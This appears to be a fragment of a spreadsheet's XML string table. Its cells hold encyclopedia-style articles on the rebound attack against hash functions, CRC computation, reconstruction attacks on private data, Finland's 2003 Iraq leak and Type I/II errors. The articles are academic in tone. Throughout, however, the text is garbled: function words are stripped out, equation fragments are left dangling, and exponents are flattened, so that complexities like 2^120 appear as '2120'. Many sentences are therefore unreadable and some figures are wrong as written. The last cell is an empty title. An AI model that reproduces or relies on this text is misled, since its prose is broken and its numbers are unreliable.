    <t>rebound attack tool cryptanalysis cryptographic hash functions. attack first published 2009 florian mendel, christian rechberger, martin schläffer søren thomsen. conceived attack like functions whirlpool grøstl, later shown also applicable designs keccak, skein. attack rebound attack type statistical attack hash functions, using techniques rotational differential cryptanalysis find collisions interesting properties. basic idea attack observe certain differential characteristic block cipher part it), permutation another type primitive. finding values fulfilling characteristic achieved splitting primitive {\displaystyle three parts {\displaystyle e=e_{\text{fw}}\circ e_{\text{in}}\circ e_{\text{bw}}} {\displaystyle e_{\text{in}}} called inbound phase {\displaystyle e_{\text{fw}}} {\displaystyle e_{\text{bw}}} together called outbound phase. attacker chooses values realize part differential characteristic inbound phase deterministically, fulfill remainder characteristic probabilistic manner. thus, rebound attack consists phases: inbound match-in-the-middle) phase, covers part differential characteristic difficult satisfy probabilistic way. goal find many solutions part characteristic average complexity. achieve this, corresponding system equations, describes characteristic phase, underdetermined. when searching solution, therefore many degrees freedom, giving many possible solutions. inbound phase repeated several times obtain sufficient number starting points outbound phase likely succeed. outbound phase solution inbound phase propagated outwards directions, checking whether characteristic also holds phase. probability characteristic outbound phase high possible.the advantage using inbound outbound phases ability calculate difficult parts differential characteristic inbound phase efficient way. furthermore, ensures high probability outbound phase. overall probability finding differential characteristic thus becomes higher using standard differential techniques. detailed description attack hash functions aes-like compression functions consider hash function uses aes-like substitution-permutation block cipher compression function. this compression function consists number rounds composed s-boxes linear transformations. general idea attack construct differential characteristic computationally expensive part middle. this part covered inbound phase, whereas easily achieved part characteristic covered outbound phase. system equations, describe characteristic inbound, phase underdetermined, many starting points outbound phase generated. since difficult part characteristic contained inbound phase possible standard differentials here, whereas truncated differentials used outbound phase achieve higher probabilities. inbound phase typically number active state bytes (bytes non-zero differences) beginning, propagate large number active bytes middle round, returning number active bytes phase. idea large number active bytes input output s-box middle phase. characteristics efficiently computed choosing values differences start inbound phase, propagating towards middle, looking matches input output s-box. like ciphers typically done row- column-wise, making procedure relatively efficient. choosing different starting ending values leads many different differential characteristics inbound phase. outbound phase goal propagate characteristics found inbound phase backwards forwards, check whether desired characteristics followed. here, truncated differentials usually used, give higher probabilities, specific values differences irrelevant goal finding collision. probability characteristic following desired pattern outbound phase depends number active bytes arranged characteristic. achieve collision, enough differentials outbound phase specific type; active bytes start characteristic must also value feed-forward operation cancelled. therefore, designing characteristic, number active bytes start outbound phase position. probability bytes cancelling adds probability outbound characteristic. overall, necessary generate sufficiently many characteristics inbound phase order expected number correct characteristics larger outbound phase. furthermore, near-collisions higher number rounds achieved starting ending outbound phase several active bytes cancel. example attack whirlpool rebound attack used hash function whirlpool find collisions variants compression function (the aes-like block cipher, reduced rounds. near-collisions found rounds. below description round attack. pre-computation make rebound attack effective, look-up table s-box differences computed attack. {\displaystyle s:\{0,1\}^{8}\to \{0,1\}^{8}} represent s-box. then pair {\displaystyle (a,b)\in \{0,1\}^{8}} find solutions {\displaystyle any) equation {\displaystyle s(x)\oplus s(x\oplus a)=b} ,where {\displaystyle represents input difference {\displaystyle represents output difference s-box. this table (called difference distribution table, ddt) makes possible find values follow characteristic specific input/output pairs s-box. table right show possible number solutions equation often occur. first describes impossible differentials, whereas last describes zero-differential. performing attack find collision rounds whirlpool, differential characteristic type shown table must found. this characteristic minimum active bytes (bytes non-zero differences), marked red. characteristic described number active bytes round, e.g. inbound phase goal inbound phase find differences fulfill part characteristic described sequence active bytes this done following three steps: choose arbitrary non-zero difference active bytes output mixrows operation round these differences propagated backwards output subbytes operation round properties mixrows operation, fully active state obtained. note done independently. choose difference active byte input mixrows operation round propagate differences forward input subbytes operation round non-zero differences byte. again, done independently row. match-in-the-middle step, table find matching input/output differences found step subbytes operation round each checked independently, expected number solutions s-box. total, expected number values follow differential characteristic 264.these steps repeated different starting values step resulting total 2128 actual values follow differential characteristic inbound phase. each values found complexity round transformations precomputation step. outbound phase outbound phase completes differential characteristic probabilistic way. outbound phase uses truncated differentials, opposed inbound phase. each starting point found inbound phase propagated forwards backwards. order follow desired characteristic, active bytes must propagate single active byte directions. transition happens probability 2−56, fulfilling characteristic probability 2−112. ensure collision, values start characteristic cancel feed-forward operation. this happens probability approximately 2−8, overall probability outbound phase therefore 2−120. find collision, 2120 starting points generated inbound phase. since done average complexity starting point, overall complexity attack 2120. extending attack basic round attack extended round attack using fully active states inbound phase. this increases complexity 2184.extending outbound phase begins ends active bytes leads near-collision bytes whirlpool reduced rounds complexity 2192.by assuming attacker control chaining value, therefore input key-schedule whirlpool, attack extended rounds semi-free-start near-collision bytes complexity 2128. notes references rebound attack: cryptanalysis reduced whirlpool grøstl florian mendel, christian rechberger, martin schlaffer, soren thomsen (fast software encryption 2009: 260-276) rebound attack reduced grøstl hash function florian mendel, christian rechberger, martin schlaffer, soren thomsen (the cryptographer's track conference 2010: 350-365) unaligned rebound attack application keccak alexandre duc, jian guo, thomas peyrin, (iacr cryptology eprint archive year 2011 improve rebound attacks maría naya-plasencia fhnw, windisch, switzerland (crypto'11 proceedings 31st annual conference advances cryptology pages 188-205) rebound attack subspace distinguishers: application whirlpool mario lamberger, florian mendel, christian rechberger, vincent rijmen, martin schläffer( iacr cryptology eprint archive, year. 2010 /198). cryptanalysis based hash functions theses martin schläffer</t>
  </si>
  <si>
    <t>Joint source and channel coding</t>
  </si>
  <si>
    <t>information theory, joint source–channel coding encoding redundant information source transmission noisy channel, corresponding decoding, using single code instead conventional steps source coding followed channel coding. joint source–channel coding proposed implemented variety situations, including speech videotransmission. references</t>
  </si>
  <si>
    <t>Computation of cyclic redundancy checks</t>
  </si>
  <si>
    <t>computation cyclic redundancy check derived mathematics polynomial division, modulo two. practice, resembles long division binary message string, fixed number zeroes appended, "generator polynomial" string except exclusive operations replace subtractions. division type efficiently realised hardware modified shift register, software series equivalent algorithms, starting simple code close mathematics becoming faster (and arguably obfuscated) byte-wise parallelism space–time tradeoffs. various standards extend polynomial division algorithm specifying initial shift register value, final exclusive-or step and, critically, ordering (endianness). result, code seen practice deviates confusingly "pure" division, register shift left right. example example implementing polynomial division hardware, suppose trying compute 8-bit 8-bit message made ascii character "w", binary 010101112, decimal 8710, hexadecimal 5716. illustration, crc-8-atm (hec) polynomial {\displaystyle x^{8}+x^{2}+x+1} writing first transmitted (the coefficient highest power {\displaystyle left, corresponds 9-bit string "100000111". byte value 5716 transmitted different orders, depending ordering convention used. each generates different message polynomial {\displaystyle m(x)} msbit-first, {\displaystyle x^{6}+x^{4}+x^{2}+x+1} 01010111, lsbit-first, {\displaystyle x^{7}+x^{6}+x^{5}+x^{3}+x} 11101010. these multiplied {\displaystyle x^{8}} produce 16-bit message polynomials {\displaystyle x^{8}m(x)} computing remainder consists subtracting multiples generator polynomial {\displaystyle g(x)} this like decimal long division, even simpler possible multiples step subtractions borrow "from infinity" instead reducing upper digits. because care quotient, need record observe subtraction, bits divided three groups: beginning, group zero; end, group unchanged original; blue shaded group middle "interesting". "interesting" group bits long, matching degree polynomial. every step, appropriate multiple polynomial subtracted make zero group longer, unchanged group becomes shorter, final remainder left. msbit-first example, remainder polynomial {\displaystyle x^{7}+x^{5}+x} converting hexadecimal number using convention highest power msbit; a216. lsbit-first, remainder {\displaystyle x^{7}+x^{4}+x^{3}} converting hexadecimal using convention highest power lsbit, 1916. implementation writing full message step, done example above, tedious. efficient implementations {\displaystyle -bit shift register hold interesting bits. multiplying polynomial {\displaystyle equivalent shifting register place, coefficients change value move next term polynomial. here first draft pseudocode computing n-bit crc. uses contrived composite data type polynomials, integer variable, constructor generating polynomial object added, multiplied exponentiated. polynomials them, modulo two; exclusive coefficients matching term polynomials. function crc(bit array bitstring[1..len], len) remainderpolynomial polynomialform(bitstring[1..n]) first bits message popular variant complements remainderpolynomial here; preset remainderpolynomial remainderpolynomial bitstring[i+n] define bitstring[k]=0 k&gt;len coefficient remainderpolynomial remainderpolynomial remainderpolynomial generatorpolynomial popular variant complements remainderpolynomial here; post-invert return remainderpolynomial code fragment simple polynomial divisionnote example code avoids need specify bit-ordering convention using bytes; input bitstring already form array, remainderpolynomial manipulated terms polynomial operations; multiplication {\displaystyle could left right shift, addition bitstring[i+n] done {\displaystyle x^{0}} coefficient, could right left register. this code disadvantages. first, actually requires n+1-bit register hold remainderpolynomial {\displaystyle x^{n}} coefficient tested. more significantly, requires bitstring padded zero bits. first problem solved testing {\displaystyle x^{n-1}} coefficient remainderpolynomial multiplied {\displaystyle second problem could solved last iterations differently, subtle optimization used universally, hardware software implementations. because operation used subtract generator polynomial message commutative associative, matter order various inputs combined remainderpolynomial. specifically, given bitstring need added remainderpolynomial last instant tested determine whether generatorpolynomial. this eliminates need preload remainderpolynomial first bits message, well: function crc(bit array bitstring[1..len], len) remainderpolynomial popular variant complements remainderpolynomial here; preset remainderpolynomial remainderpolynomial (bitstring[i] xn−1) (coefficient xn−1 remainderpolynomial) remainderpolynomial (remainderpolynomial generatorpolynomial else remainderpolynomial (remainderpolynomial popular variant complements remainderpolynomial here; post-invert return remainderpolynomial code fragment polynomial division deferred message xoringthis standard bit-at-a-time hardware implementation, well worthy study; understand computes exactly result first version, remaining optimizations quite straightforward. remainderpolynomial bits long, {\displaystyle x^{n}} coefficients generatorpolynomial simply discarded. this reason usually polynomials written binary leading coefficient omitted. software, convenient note delay last moment, also possible earlier. usually convenient perform byte time, even bit-at-a-time implementation like this: function crc(byte array string[1..len], len) remainderpolynomial popular variant complements remainderpolynomial here; preset remainderpolynomial remainderpolynomial polynomialform(string[i]) xn−8 assuming bits byte coefficient xn−1 remainderpolynomial remainderpolynomial (remainderpolynomial generatorpolynomial else remainderpolynomial (remainderpolynomial popular variant complements remainderpolynomial here; post-invert return remainderpolynomial code fragment polynomial division bytewise message xoringthis usually compact software implementation, used microcontrollers space premium speed. ordering (endianness) when implemented serial hardware, generator polynomial uniquely describes assignment; first transmitted always coefficient highest power {\displaystyle last {\displaystyle bits transmitted remainder {\displaystyle r(x)} starting coefficient {\displaystyle x^{n-1}} ending coefficient {\displaystyle x^{0}} a.k.a. coefficient however, bits processed byte time, using parallel transmission, byte framing 8b/10b encoding rs-232-style asynchronous serial communication, implementing software, necessary specify ordering (endianness) data; byte considered "first" coefficient higher power {\displaystyle data destined serial communication, best ordering data ultimately sent this crc's ability detect burst errors based proximity message polynomial {\displaystyle m(x)} adjacent polynomial terms transmitted sequentially, physical error burst length seen longer burst rearrangement bits. example, ieee (ethernet) rs-232 (serial port) standards specify least-significant first (little-endian) transmission, software implementation protect data sent across link least significant bits byte coefficients highest powers {\displaystyle hand, floppy disks hard drives write significant byte first. lsbit-first slightly simpler implement software, somewhat commonly seen, many programmers find msbit-first ordering easier follow. thus, example, xmodem-crc extension, early crcs software, uses msbit-first crc. far, pseudocode avoided specifying ordering bits within bytes describing shifts pseudocode multiplications {\displaystyle writing explicit conversions binary polynomial form. practice, held standard binary register using particular bit-ordering convention. msbit-first form, significant binary bits sent first contain higher-order polynomial coefficients, lsbit-first form, least-significant binary bits contain higher-order coefficients. pseudocode written forms. concreteness, uses 16-bit crc-16-ccitt polynomial {\displaystyle x^{16}+x^{12}+x^{5}+1} most significant first (big-endian) x^16+x^12+x^5+1 0001 0000 0010 0001 0x1021 function crc(byte array string[1..len], len) popular variant complements (string[i] leftshift (n-8)) example assuming bits byte 0x8000 leftmost (most significant) (rem leftshift 0x1021 else leftshift 0xffff trim remainder bits popular variant complements return code fragment shift register based division, first// least significant first (little-endian) x^16+x^12+x^5+1 1000 0100 0000 1000 0x8408 function crc(byte array string[1..len], len) popular variant complements string[i] assuming bits byte 0x0001 rightmost (most significant) (rem rightshift 0x8408 else rightshift popular variant complements return code fragment shift register based division, firstnote lsbit-first form avoids need shift string[i] xor. either case, sure transmit bytes order matches chosen bit-ordering convention. multi-bit computation sarwate algorithm (single lookup table) another common optimization uses lookup table indexed highest order coefficients process dividend iteration. most commonly, 256-entry lookup table used, replacing body outer loop (over with: msbit-first (rem leftshift big_endian_table[string[i] ((leftmost bits rem) rightshift (n-8))] lsbit-first (rem rightshift little_endian_table[string[i] (rightmost bits rem)] code fragment cores table based divisionone commonly encountered algorithms known crc-32, used (among others) ethernet, fddi, archive formats, image format. polynomial written msbit-first 0x04c11db7, lsbit-first 0xedb88320. webpage includes appendix short simple table-driven implementation crc-32. note code corresponds lsbit-first byte-at-a-time pseudocode presented here, table generated using bit-at-a-time code. using 256-entry table usually convenient, sizes used. small microcontrollers, using 16-entry table process four bits time gives useful speed improvement keeping table small. computers ample storage, 65536-entry table used process bits time. generating tables software generate tables small fast usually faster compute program startup load precomputed tables storage. popular technique bit-at-a-time code times generate crcs possible 8-bit bytes. however, optimized significantly taking advantage property table[i table[i] table[j]. only table entries corresponding powers need computed directly. following example code, holds value table[i]: big_endian_table[0] 0x8000 assuming 16-bit polynomial 0x8000 (crc leftshift 0x1021 polynomial else leftshift value big_endian_table[i]; iterate already-initialized entries big_endian_table[i big_endian_table[j]; leftshift code fragment byte-at-a-time table generation, firstlittle_endian_table[0] (crc rightshift 0x8408 polynomial else rightshift value little_endian_table[i]; iterate already-initialized entries little_endian_table[i little_endian_table[j]; rightshift code fragment byte-at-a-time table generation, firstin code samples, table index equivalent whichever form convenient. byte-slicing using multiple tables there exists slice-by-n (typically slice-by-8 crc32; algorithm usually doubles triples performance compared sarwate algorithm. instead reading bits time, algorithm reads bits time. doing maximizes performance superscalar processors.it unclear actually invented algorithm. parallel computation without table parallel update byte word time also done explicitly, without table. this normally used high-speed hardware implementations. equation solved bits shifted following tables list equations commonly used polynomials, using following symbols: two-step computation crc-32 polynomial large number terms, computing remainder byte time depends several bits previous iteration. byte-parallel hardware implementations calls either multiple-input cascaded gates increases propagation delay. maximise computation speed, intermediate remainder calculated passing message 123-bit shift register. polynomial carefully selected multiple standard polynomial terms (feedback taps) widely spaced, remainder xored byte iteration. thus two-input gates, fastest possible, needed. finally intermediate remainder divided standard polynomial second shift register yield crc-32 remainder. one-pass checking when appending message, possible detach transmitted crc, recompute verify recomputed value transmitted one. however, simpler technique commonly used hardware. when transmitted correct byte order (matching chosen bit-ordering convention), receiver compute overall crc, message crc, correct, result zero. this possibility reason network protocols include ending delimiter; necessary know whether packet imminent check crc. variants practice, standards specify presetting register all-ones inverting transmission. this effect ability detect changed bits, gives ability notice bits added message. preset basic mathematics accepts (considers correctly transmitted) messages which, interpreted polynomial, multiple polynomial. leading bits prepended message, change interpretation polynomial. this equivalent fact 0001 number. message transmitted care leading bits, inability basic algorithm detect change undesirable. possible transmission error could bits, simple solution start shift register non-zero value; convenience, all-ones value typically used. this mathematically equivalent complementing (binary not) first bits message, number bits register. this affect generation checking way, long generator checker initial value. non-zero initial value standards specify unusual values, all-ones value twos complement binary) common. note one-pass generate/check still produce result zero message correct, regardless preset value. post-invert sort error occur message, albeit limited messages. appending bits message equivalent multiplying polynomial previously multiple polynomial, result multiplication well. this equivalent fact that, since multiple 7260. similar solution applied message, inverting register appended message. again, non-zero change inverting bits (xoring all-ones pattern) simply common. this effect one-pass checking: instead producing result zero message correct, produces fixed non-zero result. precise, result (without non-zero preset, post-invert) inversion pattern.) once constant obtained (most easily performing one-pass generate/check arbitrary message), used directly verify correctness message checked using algorithm. also general category error correcting code list hash functions parity equivalent 1-bit polynomial x+1.non-crc checksums adler-32 fletcher's checksum references external links johnpaul adamovsky. cyclic redundant code long division bytewise table lookup".andrew kadarch, jenkins. "efficient cycle byte) implementation". github.</t>
  </si>
  <si>
    <t>Reconstruction attack</t>
  </si>
  <si>
    <t>reconstruction attack method partially reconstructing private dataset public aggregate information. typically, dataset contains sensitive information individuals, whose privacy needs protected. attacker partial access dataset, access public aggregate statistics datasets, could exact distorted, example adding noise. public statistics sufficiently distorted, attacker able accurately reconstruct large portion original private data. reconstruction attacks relevant analysis private data, show that, order preserve even weak notion individual privacy, published statistics need sufficiently distorted. this phenomenon called fundamental information recovery dwork roth, formulated "overly accurate answers many questions destroy privacy spectacular way." dinur-nissim attack 2003, irit dinur kobbi nissim proposed reconstruction attack based noisy answers multiple statistical queries. their work recognized 2013 pods alberto mendelzon test-of-time award part seed development differential privacy.dinur nissim model private database sequence bits {\displaystyle d=(d_{1},\ldots ,d_{n})} private information single individual. database query specified subset {\displaystyle s\subseteq \{1,\ldots ,n\}} defined equal {\displaystyle q_{s}(d)=\sum _{i\in s}{d_{i}}} they show that, given approximate answers {\displaystyle a_{1},\ldots ,a_{m}} queries specified sets {\displaystyle s_{1},\ldots ,s_{m}} {\displaystyle |a_{i}-q_{s_{i}}(d)|\leq {\mathcal {e}}} {\displaystyle i\in \{1,\ldots ,m\}} {\displaystyle {\mathcal {e}}} sufficiently small {\displaystyle sufficiently large, attacker reconstruct private bits {\displaystyle here error bound {\displaystyle {\mathcal {e}}} function {\displaystyle {\displaystyle nissim dinur's attack works regimes: regime, {\displaystyle exponential {\displaystyle error {\displaystyle {\mathcal {e}}} linear {\displaystyle regime, {\displaystyle polynomial {\displaystyle error {\displaystyle {\mathcal {e}}} order {\displaystyle {\sqrt {n}}} references</t>
  </si>
  <si>
    <t>Iraq leak</t>
  </si>
  <si>
    <t>iraq leak (also iraq-gate, iraq scandal) series events began march 2003 statement given anneli jäätteenmäki, leader finnish centre party, televised election debate prior 2003 parliamentary election. jäätteenmäki accused paavo lipponen, prime minister finland, attaching finland george bush's 'coalition willing' preparation 2003 iraq.[1] lipponen visited washington december 2002. according jäätteenmäki, finland taken part meeting 'those countries promised cooperation aid' invited. later discovered jäätteenmäki acquired information secret foreign ministry documents, received martti manninen, advisor president finland member jäätteenmäki's party. prime minister lipponen's actions suggested influenced fact finland sell amos mortars u.s. military part land warrior program. left alliance member parliament jaakko laakso, together representatives, posted public question lipponen's statements washington already december 2002.[2] there public inquiry matter, even though documents cast doubt legality mortar deals 2001 afghanistan. green member ulla anttila others questioned authorisation export arms granted patria-hägglunds shortly started.[3]the centre party parliamentary election became largest party parliament. jäätteenmäki appointed prime minister finland president tarja halonen april 2003.[4] however, lack confidence jäätteenmäki caused secret documents campaign flat-out denial parliament solicited them, despite incriminating evidence, forced resign prime minister june. jäätteenmäki claimed received documents unexpectedly without solicitation, manninen denied. cabinet formed matti vanhanen, also became leader centre party.[5] manninen also sacked advisor president. december 2003, criminal charges pressed martti manninen leaking secret documents anneli jäätteenmäki incitement same. manninen found guilty, fines, jäätteenmäki found guilty, specifically request documents. david schlaefer, spokesperson u.s. embassy helsinki, denied 2003 jäätteenmäki's resignation ever understanding cooperation assistance finland u.s. lipponen's meetings washington, stating conference university helsinki simply true, happen." references jäätteenmäki: suomi liitetty usa:n rintamaan eduskunta: 1096/2002 jaakko laakso /vas eduskunta: 47/2003 ulla anttila /vihr tasavallan presidentin kanslia: tasavallan presidentti instituutiona valtioneuvoston luettelo suomen hallituksista</t>
  </si>
  <si>
    <t>Type I and type II errors</t>
  </si>
  <si>
    <t>statistical hypothesis testing, type error mistaken rejection actually true null hypothesis (also known "false positive" finding conclusion; example: innocent person convicted"), type error failure reject null hypothesis actually false (also known "false negative" finding conclusion; example: guilty person convicted"). much statistical theory revolves around minimization errors, though complete elimination either statistical impossibility outcome determined known, observable causal process. selecting threshold (cut-off) value modifying alpha level, quality hypothesis test increased. knowledge type errors type errors widely used medical science, biometrics computer science.intuitively, type errors thought errors commission, i.e. researcher unluckily concludes something fact. instance, consider study researchers compare drug placebo. patients given drug better patients given placebo chance, appear drug effective, fact conclusion incorrect. reverse, type errors errors omission. example above, patients drug better higher rate ones placebo, random fluke, would type error. consequence type error depends size direction missed determination circumstances. expensive cure million patients inconsequential even truly cure. definition statistical background statistical test theory, notion statistical error integral part hypothesis testing. test goes choosing competing propositions called null hypothesis, denoted alternative hypothesis, denoted this conceptually similar judgement court trial. null hypothesis corresponds position defendant: presumed innocent proven guilty, null hypothesis presumed true data provide convincing evidence alternative hypothesis corresponds position defendant. specifically, null hypothesis also involves absence difference absence association. thus, null hypothesis never difference association. result test corresponds reality, correct decision made. however, result test correspond reality, error occurred. there situations decision wrong. null hypothesis true, whereas reject hand, alternative hypothesis true, whereas reject types error distinguished: type error type error. type error first kind error mistaken rejection null hypothesis result test procedure. this kind error called type error (false positive) sometimes called error first kind. terms courtroom example, type error corresponds convicting innocent defendant. type error second kind error mistaken failure reject null hypothesis result test procedure. this sort error called type error (false negative) also referred error second kind. terms courtroom example, type error corresponds acquitting criminal. crossover error rate crossover error rate (cer) point type errors type errors equal represents best measuring biometrics' effectiveness. system lower value provides accuracy system higher value. false positive false negative terms false positives false negatives, positive result corresponds rejecting null hypothesis, negative result corresponds failing reject null hypothesis; "false" means conclusion drawn incorrect. thus, type error equivalent false positive, type error equivalent false negative. table error types tabularised relations truth/falseness null hypothesis outcomes test: error rate perfect test would zero false positives zero false negatives. however, statistical methods probabilistic, cannot known certain whether statistical conclusions correct. whenever uncertainty, possibility making error. considering nature statistics science, statistical hypothesis tests probability making type type errors. type error rate significance level probability rejecting null hypothesis given true. denoted greek letter (alpha) also called alpha level. usually, significance level 0.05 (5%), implying acceptable probability incorrectly rejecting true null hypothesis. rate type error denoted greek letter (beta) related power test, equals 1−β.these types error rates traded other: given sample set, effort reduce type error generally results increasing type error. quality hypothesis test idea expressed terms rate correct results therefore used minimize error rates improve quality hypothesis test. reduce probability committing type error, making alpha value stringent quite simple efficient. decrease probability committing type error, closely associated analyses' power, either increasing test's sample size relaxing alpha level could increase analyses' power. test statistic robust type error rate controlled. varying different threshold (cut-off) value could also used make test either specific sensitive, turn elevates test quality. example, imagine medical test, experimenter might measure concentration certain protein blood sample. experimenter could adjust threshold (black vertical line figure) people would diagnosed diseases number detected certain threshold. according image, changing threshold would result changes false positives false negatives, corresponding movement curve. example since real experiment impossible avoid type type errors, important consider amount risk willing take falsely reject accept solution question would report p-value significance level statistic. example, p-value test statistic result estimated 0.0596, probability 5.96% falsely reject say, statistic performed level like 0.05, allow falsely reject significance level 0.05 relatively common, general rule fits scenarios. vehicle speed measuring speed limit freeway united states kilometers hour. device measure speed passing vehicles. suppose device conduct three measurements speed passing vehicle, recording random sample traffic police fine drivers depending average speed {\displaystyle {\bar {x}}} that say, test statistic {\displaystyle t={\frac {x_{1}+x_{2}+x_{3}}{3}}={\bar {x}}} addition, suppose measurements modeled normal distribution n(μ,4). then, follow n(μ,4/3) parameter represents true speed passing vehicle. experiment, null hypothesis alternative hypothesis μ=120 μ1&gt;120. perform statistic level α=0.05, critical value calculated solve 0.05 {\displaystyle p\left(z\geqslant {\frac {c-120}{\frac {2}{\sqrt {3}}}}\right)=0.05} according change-of-units rule normal distribution. referring z-table, 1.645 121.9 {\displaystyle {\frac {c-120}{\frac {2}{\sqrt {3}}}}=1.645\rightarrow c=121.9} here, critical region. that say, recorded speed vehicle greater critical value 121.9, driver fined. however, still drivers falsely fined since recorded average speed greater 121.9 true speed pass 120, say, type error. type error corresponds case true speed vehicle kilometers hour driver fined. example, true speed vehicle μ=125, probability driver fined calculated 121.9 121.9 2.68 0.0036 {\displaystyle p=(t&lt;121.9|\mu =125)=p\left({\frac {t-125}{\frac {2}{\sqrt {3}}}}&lt;{\frac {121.9-125}{\frac {2}{\sqrt {3}}}}\right)=\phi (-2.68)=0.0036} means, true speed vehicle 125, driver probability 0.36% avoid fine statistic performed level since recorded average speed lower 121.9. true speed closer 121.9 125, probability avoiding fine also higher. tradeoffs type error type error also considered. that case, traffic police want falsely fine innocent drivers, level smaller value, like 0.01. however, case, drivers whose true speed kilometers hour, like 125, would likely avoid fine. etymology 1928, jerzy neyman (1894–1981) egon pearson (1895–1980), eminent statisticians, discussed problems associated "deciding whether particular sample judged likely randomly drawn certain population": and, florence nightingale david remarked, necessary remember adjective 'random' term 'random sample'] apply method drawing sample sample itself".they identified "two sources error", namely: error rejecting hypothesis rejected, and(b) error failing reject hypothesis rejected.in 1930, elaborated sources error, remarking that: ...in testing hypotheses considerations must kept view, must able reduce chance rejecting true hypothesis value desired; test must devised reject hypothesis tested likely false. 1933, observed "problems rarely presented form discriminate certainty true false hypothesis" they also noted that, deciding whether fail reject, reject particular hypothesis amongst "set alternative hypotheses", h2..., easy make error: ...[and] errors kinds:(i) reject [i.e., hypothesis tested] true, (ii) fail reject alternative hypothesis true. (there various notations alternative). papers co-written neyman pearson expression always signifies "the hypothesis tested". paper call sources error, errors type errors type respectively. related terms null hypothesis standard practice statisticians conduct tests order determine whether "speculative hypothesis" concerning observed phenomena world inhabitants) supported. results testing determine whether particular results agrees reasonably agree) speculated hypothesis. basis always assumed, statistical convention, speculated hypothesis wrong, so-called "null hypothesis" observed phenomena simply occur chance (and that, consequence, speculated agent effect) test determine whether hypothesis right wrong. this hypothesis test often called null hypothesis (most likely, coined fisher (1935, 19)), hypothesis either nullified nullified test. when null hypothesis nullified, possible conclude data support "alternative hypothesis" (which original speculated one). consistent application statisticians neyman pearson's convention representing "the hypothesis tested" "the hypothesis nullified") expression circumstances many understand term "the null hypothesis" meaning "the hypothesis" statement results question arisen chance. this necessarily case restriction, fisher (1966), "the null hypothesis must exact, free vagueness ambiguity, must supply basis 'problem distribution,' test significance solution." consequence this, experimental science null hypothesis generally statement particular treatment effect; observational science, difference value particular measured variable, experimental prediction. statistical significance probability obtaining result extreme obtained, supposing null hypothesis true, lower pre-specified cut-off probability (for example, 5%), result said statistically significant null hypothesis rejected. british statistician ronald aylmer fisher (1890–1962) stressed "null hypothesis": never proved established, possibly disproved, course experimentation. every experiment said exist order give facts chance disproving null hypothesis. application domains medicine practice medicine, differences applications screening testing considerable. medical screening screening involves relatively cheap tests given large populations, none manifest clinical indication disease (e.g., smears). testing involves expensive, often invasive, procedures given manifest clinical indication disease, often applied confirm suspected diagnosis. example, states require newborns screened phenylketonuria hypothyroidism, among congenital disorders. hypothesis: "the newborns phenylketonuria hypothyroidism" null hypothesis (h0): "the newborns phenylketonuria hypothyroidism", type error (false positive): true fact newborns phenylketonuria hypothyroidism consider disorders according data. type error (false negative): true fact newborns phenylketonuria hypothyroidism consider disorders according data. although display high rate false positives, screening tests considered valuable greatly increase likelihood detecting disorders earlier stage. simple blood tests used screen possible blood donors hepatitis significant rate false positives; however, physicians much expensive precise tests determine whether person actually infected either viruses. perhaps widely discussed false positives medical screening come breast cancer screening procedure mammography. rate false positive mammograms 15%, highest world. consequence high false positive rate that, 10-year period, half american women screened receive false positive mammogram. false positive mammograms costly, $100 million spent annually u.s. follow-up testing treatment. they also cause women unneeded anxiety. result high false positive rate many 90–95% women positive mammogram condition. lowest rate world netherlands, lowest rates generally northern europe mammography films read twice high threshold additional testing (the high threshold decreases power test). ideal population screening test would cheap, easy administer, produce zero false-negatives, possible. such tests usually produce false-positives, subsequently sorted sophisticated (and expensive) testing. medical testing false negatives false positives significant issues medical testing. hypothesis: "the patients specific disease". null hypothesis (h0): "the patients specific disease". type error (false positive): "the true fact patients specific disease physicians judges patients according test reports". false positives also produce serious counter-intuitive problems condition searched rare, screening. test false positive rate thousand, million samples people) true positive, positives detected test false. probability observed positive result false positive calculated using bayes' theorem. type error (false negative): "the true fact disease actually present test reports provide falsely reassuring message patients physicians disease absent". false negatives produce serious counter-intuitive problems, especially condition searched common. test false negative rate used test population true occurrence rate 70%, many negatives detected test false. this sometimes leads inappropriate inadequate treatment patient disease. common example relying cardiac stress tests detect coronary atherosclerosis, even though cardiac stress tests known detect limitations coronary artery blood flow advanced stenosis. biometrics biometric matching, fingerprint recognition, facial recognition iris recognition, susceptible type type errors. hypothesis: "the input identify someone searched list people" null hypothesis: "the input identify someone searched list people" type error (false reject rate): "the true fact person someone searched list system concludes person according data". type error (false match rate): "the true fact person someone searched list system concludes person someone looking according data". probability type errors called "false reject rate" (frr) false non-match rate (fnmr), probability type errors called "false accept rate" (far) false match rate (fmr). system designed rarely match suspects probability type errors called "false alarm rate". hand, system used validation (and acceptance norm) measure system security, measures user inconvenience level. security screening false positives routinely found every airport security screening, ultimately visual inspection systems. installed security alarms intended prevent weapons brought onto aircraft; often high sensitivity alarm many times minor items, keys, belt buckles, loose change, mobile phones, tacks shoes. here, null hypothesis item weapon, alternative hypothesis item weapon. type error (false positive): "the true fact item weapon system still alarms". type error (false negative) "the true fact item weapon system keeps silent time". ratio false positives (identifying innocent traveler terrorist) true positives (detecting would-be terrorist) therefore, high; almost every alarm false positive, positive predictive value screening tests low. relative cost false results determines likelihood test creators allow events occur. cost false negative scenario extremely high (not detecting bomb brought onto plane could result hundreds deaths) whilst cost false positive relatively reasonably simple inspection) appropriate test statistical specificity high statistical sensitivity (one allows high rate false positives return minimal false negatives). computers notions false positives false negatives wide currency realm computers computer applications, including computer security, spam filtering, malware, optical character recognition many others. example, case spam filtering hypothesis message spam. thus, null hypothesis: "the message spam". type error (false positive): "spam filtering spam blocking techniques wrongly classify legitimate email message spam and, result, interferes delivery". while anti-spam tactics block filter high percentage unwanted emails, without creating significant false-positive results much demanding task. type error (false negative): "spam email detected spam, classified non-spam". number false negatives indicator efficiency spam filtering. also references bibliography external links bias confounding presentation nigel paneth, graduate school public health, university pittsburgh</t>
  </si>
  <si>
    <t>Computer game bot Turing Test</t>
  </si>
  <si>
